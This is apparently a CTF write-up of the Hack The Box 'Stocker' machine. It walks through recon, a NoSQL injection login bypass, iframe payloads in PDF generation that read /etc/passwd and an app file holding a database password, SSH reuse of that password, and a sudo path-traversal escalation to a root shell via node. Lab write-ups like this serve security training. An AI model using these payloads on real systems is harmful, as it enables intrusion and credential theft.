Just tackled the ‘Stocker’ machine on #HackTheBox. Loved the explotation of web vulnerabilities and the challenge of the injections! If you’re into #CTF, this is a must try! 🚀 #CyberSecurity #PenTesting #EthicalHacking #InfoSec
We will check which kind of services are running in this machine with NMAP:
sudo nmap -sT -n -Pn -sV -T4 -v 10.10.11.196We have found two open ports (22/TCP and 80/TCP):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelNow, we will check the nginx server through our navigator but first we need to add the server to our “/etc/hosts” file:
We found some kind of business web page:
Now, we need to check the functionality of the web page to try to find something interesting. Also, we can run “ffuf” tool to discover more interesting directories:
sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://stocker.htb/FUZZ -v[Status: 200, Size: 15463, Words: 4199, Lines: 322, Duration: 50ms]
| URL | http://stocker.htb/
* FUZZ:
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 62ms]
| URL | http://stocker.htb/css
| --> | http://stocker.htb/css/
* FUZZ: css
[Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 51ms]
| URL | http://stocker.htb/favicon.ico
* FUZZ: favicon.ico
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 48ms]
| URL | http://stocker.htb/fonts
| --> | http://stocker.htb/fonts/
* FUZZ: fonts
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 52ms]
| URL | http://stocker.htb/img
| --> | http://stocker.htb/img/
* FUZZ: img
[Status: 200, Size: 15463, Words: 4199, Lines: 322, Duration: 51ms]
| URL | http://stocker.htb/index.html
* FUZZ: index.html
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 77ms]
| URL | http://stocker.htb/js
| --> | http://stocker.htb/js/
* FUZZ: js
:: Progress: [4614/4614] :: Job [1/1] :: 649 req/sec :: Duration: [0:00:07] :: Errors: 0 ::We haven’t found nothing interesting but we need to still checking the web page:
We haven’t found nothing interesting in the source code. We can try to enumerate the subdomain with “fuff”. We will perform a VHOST discovery (https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480):
sudo ffuf -c -w /home/david/hackthebox/stocker/dic.txt -u http://stocker.htb -H "Host: FUZZ.stocker.htb" -mc 200,302,307 -vI have used this dictionary:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt
We will found one posible directory:
________________________________________________
:: Method : GET
:: URL : http://stocker.htb
:: Wordlist : FUZZ: /home/david/hackthebox/stocker/dic.txt
:: Header : Host: FUZZ.stocker.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,302,307
________________________________________________
[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 72ms]
| URL | http://stocker.htb
| --> | /login
* FUZZ: dev
:: Progress: [4989/4989] :: Job [1/1] :: 653 req/sec :: Duration: [0:00:07] :: Errors: 0 ::We need to add this new subdomain in our “/etc/hosts” file:
After that, we will can see this new web page:
Apparently is some kind of login. Let’s try to get more information about this login. We will try if we can do some SQL Injection with sqlmap:
sudo sqlmap -u "http://dev.stocker.htb/login" --data="username=example&password=example"We have received any information about which database is in the backend. We will try to exploit no SQL databases. We can find some information about that here (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL Injection). We will try with the next payload:
{"username": {"$ne": null}, "password": {"$ne": null}}Now, we need to modify our request to try to bypass the login. We need to modify the “Content-Type” and the data (user and password):
Finally, we have done our bypass and we will received another redirection to “/stock”:
Now we will check some function of this web page like add some products, check the cart, etc. If we check how to add some products to our basket, we will see this message:
Probable, here we have some interesting. Also, we can check the option “View Cart” to check our products:
If we checking the request with burp suite we will see the petition with the data in JSON and probable we can modify it:
Another function is generating pdf’s with our purchases:
We can check the request with burp suite to see if something weird is happend:
We will see all of our products but let’s try modify our request to see if the PDF change with our values:
We will check the vulnerability XSS with Dynamic PDF. To do that we will change our “Submit Purchase” request with the next payload to see if we have some tips of disclosure. We will inject this payload into the key “tittle”:
<script>document.write(JSON.stringify(window.location))</script>
After create our “order” we will click in our link to see our PDF:
We will discover that this web is vulnerable to XSS with Dynamic PDF (https://exploit-notes.hdks.org/exploit/web/security-risk/xss-with-dynamic-pdf/):
Now we will try to extract more information to try to gain access. We can try to obtain the “/etc/passwd” file:
<iframe src=file:///etc/passwd></iframe>
Now we need to generate the PDF:
We will see our data but with one issue we can’t see all the data because we have used a small iframe:
We need to modify our payload with something like this:
<iframe src=file:///etc/passwd height=1000 width=1000></iframe>
Now we will see all:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
landscape:x:109:116::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mongodb:x:113:65534::/home/mongodb:/usr/sbin/nologin
angoose:x:1001:1001:,,,:/home/angoose:/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
We have discovered two users:
mongodb
angooseIn this point, we can try to extract more information from the index file in the directory we already have detected in our discover phase:
/var/www/dev/ - URL<iframe src=file:///var/www/dev/index.js height=1000 width=1000></iframe>
We will discover the database password:
const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";
But we can’t connect whit the user mongodb through SSH because this user has disabled this function. We will try to check this password with the another user we have discovered:
ssh angoose@10.10.11.196 - IHeardPassphrasesArePrettySecureFinally, we already have our first remote connection:
Also, we can get our user flag:
goose@stocker:~$ ls
flag.js flag.js.save user.txt
angoose@stocker:~$ cat user.txt Time to try to get access as a root. Let’s see if we can execute some script or something with sudo privileges:
angoose@stocker:~$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.jsWe have detected we can execute any “js” script in the directory “/usr/local/scripts” with the binary “/usr/bin/node” with sudo privileges. With a little search in google we can found this link (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation/). Now to try to do PE, first of all, we need to create a new file in “/tmp/file.js” with this content:
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
Now we will do a “Sudo Path Traversal Privilege Escalation”:
sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.jsFinally, we have access like a root:
Also, we have access to the root flag:
# cd /root
# ls -la
total 44
drwx------ 6 root root 4096 Jan 9 10:42 .
drwxr-xr-x 20 root root 4096 Dec 23 16:58 ..
lrwxrwxrwx 1 root root 9 Dec 6 2022 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Nov 19 2022 .bashrc
drwx------ 3 root root 4096 Dec 6 2022 .cache
drwxr-xr-x 3 root root 4096 Dec 6 2022 .local
drwx------ 3 root root 4096 Dec 6 2022 .mongodb
drwxr-xr-x 4 root root 4096 Dec 6 2022 .npm
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Jun 9 14:08 root.txt
-rw-r--r-- 1 root root 66 Dec 21 21:35 .selected_editor
-rw-r--r-- 1 root root 13 Nov 19 2022 .vimrc
# cat root.txt
Finally, we pwned this machine!